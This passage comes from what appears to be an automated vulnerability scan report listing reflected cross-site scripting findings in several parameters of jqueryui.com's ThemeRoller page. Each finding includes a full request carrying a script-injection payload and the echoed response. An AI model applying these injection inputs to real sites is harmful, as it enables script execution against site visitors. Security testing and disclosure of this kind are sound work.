Referer: http://jqueryui.com/themeroller/#ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: jqueryui.com
Proxy-Connection: Keep-Alive
Cookie: __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmb=77982607.4.10.1289873280; __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmc=77982607

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:28 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 39552


<!-- Download theme button -->
<a href="/download?themeParams=%3FffDefault%3DSegoe%2BUI%252C%2BArial%252C%2Bsans-serif%26fwDefault%3Dbold%26fsDefault%3D1.1em%26cornerRadius%3D8px%26bgColorHeader%3
...[SNIP]...
<input type="text" name="iconColorContent" id="iconColorContent" class="hex" value="d1940536cec\\\"><script>alert(1)</script>eae2f93adaf" size="6" />
...[SNIP]...

1.168. http://jqueryui.com/themeroller/_rollyourown.php [iconColorDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/_rollyourown.php

Issue detail

The value of the iconColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d6885"><script>alert(1)</script>77d23ead5ea was submitted in the iconColorDefault parameter. This input was echoed as d6885\\\"><script>alert(1)</script>77d23ead5ea in the application's response. The backslashes prepended to the quotation mark do not neutralise the payload: an HTML parser does not treat a backslash as an escape character, so the quotation mark still terminates the attribute value and the injected tag is parsed as markup.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/_rollyourown.php?ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3dd6885"><script>alert(1)</script>77d23ead5ea&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: http://jqueryui.com/themeroller/#ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: jqueryui.com
Proxy-Connection: Keep-Alive
Cookie: __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmb=77982607.4.10.1289873280; __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmc=77982607

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:32 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 39552


<!-- Download theme button -->
<a href="/download?themeParams=%3FffDefault%3DSegoe%2BUI%252C%2BArial%252C%2Bsans-serif%26fwDefault%3Dbold%26fsDefault%3D1.1em%26cornerRadius%3D8px%26bgColorHeader%3
...[SNIP]...
<input type="text" name="iconColorDefault" id="iconColorDefault" class="hex" value="3d3d3dd6885\\\"><script>alert(1)</script>77d23ead5ea" size="6" />
...[SNIP]...

1.169. http://jqueryui.com/themeroller/_rollyourown.php [iconColorError parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/_rollyourown.php

Issue detail

The value of the iconColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e8f25"><script>alert(1)</script>302e12ef894 was submitted in the iconColorError parameter. This input was echoed as e8f25\\\"><script>alert(1)</script>302e12ef894 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/_rollyourown.php?ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180e8f25"><script>alert(1)</script>302e12ef894&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: http://jqueryui.com/themeroller/#ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: jqueryui.com
Proxy-Connection: Keep-Alive
Cookie: __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmb=77982607.4.10.1289873280; __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmc=77982607

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:47 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 39552


<!-- Download theme button -->
<a href="/download?themeParams=%3FffDefault%3DSegoe%2BUI%252C%2BArial%252C%2Bsans-serif%26fwDefault%3Dbold%26fsDefault%3D1.1em%26cornerRadius%3D8px%26bgColorHeader%3
...[SNIP]...
<input type="text" name="iconColorError" id="iconColorError" class="hex" value="ffe180e8f25\\\"><script>alert(1)</script>302e12ef894" size="6" />
...[SNIP]...

1.170. http://jqueryui.com/themeroller/_rollyourown.php [iconColorHeader parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/_rollyourown.php

Issue detail

The value of the iconColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1861a"><script>alert(1)</script>6caea56c1bd was submitted in the iconColorHeader parameter. This input was echoed as 1861a\\\"><script>alert(1)</script>6caea56c1bd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/_rollyourown.php?ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a1861a"><script>alert(1)</script>6caea56c1bd&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: http://jqueryui.com/themeroller/#ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: jqueryui.com
Proxy-Connection: Keep-Alive
Cookie: __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmb=77982607.4.10.1289873280; __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmc=77982607

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:25 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 39552


<!-- Download theme button -->
<a href="/download?themeParams=%3FffDefault%3DSegoe%2BUI%252C%2BArial%252C%2Bsans-serif%26fwDefault%3Dbold%26fsDefault%3D1.1em%26cornerRadius%3D8px%26bgColorHeader%3
...[SNIP]...
<input type="text" name="iconColorHeader" id="iconColorHeader" class="hex" value="fadc7a1861a\\\"><script>alert(1)</script>6caea56c1bd" size="6" />
...[SNIP]...

1.171. http://jqueryui.com/themeroller/_rollyourown.php [iconColorHighlight parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/_rollyourown.php

Issue detail

The value of the iconColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c128"><script>alert(1)</script>4cb1584f29a was submitted in the iconColorHighlight parameter. This input was echoed as 4c128\\\"><script>alert(1)</script>4cb1584f29a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/_rollyourown.php?ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f264c128"><script>alert(1)</script>4cb1584f29a&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: http://jqueryui.com/themeroller/#ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: jqueryui.com
Proxy-Connection: Keep-Alive
Cookie: __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmb=77982607.4.10.1289873280; __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmc=77982607

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:44 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 39552


<!-- Download theme button -->
<a href="/download?themeParams=%3FffDefault%3DSegoe%2BUI%252C%2BArial%252C%2Bsans-serif%26fwDefault%3Dbold%26fsDefault%3D1.1em%26cornerRadius%3D8px%26bgColorHeader%3
...[SNIP]...
<input type="text" name="iconColorHighlight" id="iconColorHighlight" class="hex" value="ed9f264c128\\\"><script>alert(1)</script>4cb1584f29a" size="6" />
...[SNIP]...

1.172. http://jqueryui.com/themeroller/_rollyourown.php [iconColorHover parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/_rollyourown.php

Issue detail

The value of the iconColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b465"><script>alert(1)</script>c8a7d49819 was submitted in the iconColorHover parameter. This input was echoed as 3b465\\\"><script>alert(1)</script>c8a7d49819 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/_rollyourown.php?ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b003b465"><script>alert(1)</script>c8a7d49819&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: http://jqueryui.com/themeroller/#ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: jqueryui.com
Proxy-Connection: Keep-Alive
Cookie: __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmb=77982607.4.10.1289873280; __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmc=77982607

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:35 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 39550


<!-- Download theme button -->
<a href="/download?themeParams=%3FffDefault%3DSegoe%2BUI%252C%2BArial%252C%2Bsans-serif%26fwDefault%3Dbold%26fsDefault%3D1.1em%26cornerRadius%3D8px%26bgColorHeader%3
...[SNIP]...
<input type="text" name="iconColorHover" id="iconColorHover" class="hex" value="bd7b003b465\\\"><script>alert(1)</script>c8a7d49819" size="6" />
...[SNIP]...

1.173. http://jqueryui.com/themeroller/_rollyourown.php [offsetLeftShadow parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/_rollyourown.php

Issue detail

The value of the offsetLeftShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 16d23"><script>alert(1)</script>365c925dcd6 was submitted in the offsetLeftShadow parameter. This input was echoed as 16d23\\\"><script>alert(1)</script>365c925dcd6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/_rollyourown.php?ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.